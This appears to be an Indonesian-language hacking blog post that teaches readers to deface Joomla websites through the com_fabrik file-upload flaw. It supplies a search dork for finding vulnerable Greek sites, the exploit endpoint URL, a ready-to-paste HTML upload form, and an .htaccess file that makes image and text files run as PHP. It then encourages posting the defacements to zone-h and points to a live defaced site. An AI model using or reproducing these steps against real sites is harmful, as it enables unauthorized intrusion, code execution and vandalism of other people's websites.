Deface Poc Com_fabrik Fresh 2022
Com_fabrik adalah salah satu metode lama yang secara instan bisa mengunggah script ke halaman utama
Masih bisa dapet yang fresh meski pake dork pasaran
Bagi kalian yang mau nyoba sekalian aku kasih tutorialnya
Silahkan dorking dengan inurl:/com_fabrik site:gr
Disini saya sudah dapet webnya
Setelah mendapatkan webnya kalian coba exploit menggunakan index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Jika berhasil akan seperti
Setelelah itu kalian buat csrf copas script berikut :
<form method="POST" action="http://web kalan.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"><input type="file" name="file"><button>Hajarr</button></form>
<Font Color="green" Face="courier new"><font size="8">CSRF www.nts-7.net</h1><br><br>
Ganti "web kalian.com dengan web yang kalian temukan".
Setelah itu upload script kalian bisa langsung ektensi index.htm jika ingin ngindex atau set .htcsss
Karena disini saya set .htaccess maka silahkan buat file .htaccess terlebih dahulu dengan isi seperti berikut :
#Alternate default index page
DirectoryIndex nts7.htm
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
nts7.htm bisa kalian ganti dengan nama script kalian
Dan ini :
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
Terserah bisa kalian hapus atau tidak tapi disini saya biarkan aja.
Upload file .htaccessnya
Klik hajar
Dan jika berhasil
Setelah itu selesai
Silahkan akses indexnya
Taraa hekedbaime
Syukur syukur kalo fresh cui auto submit ke zone-h
Nih live targetnya santai aja : http://www.zone-h.org/mirror/id/40225094
Udah gitu aja komen aja kalo ada yang pengen ditanyakan pasti gua bales kok
0 Response to "Deface Poc Com_fabrik Fresh 2022"
Post a Comment
Berkomentar dengan bijak dan sopan adalah salah satu cara agar cepat direspon oleh admin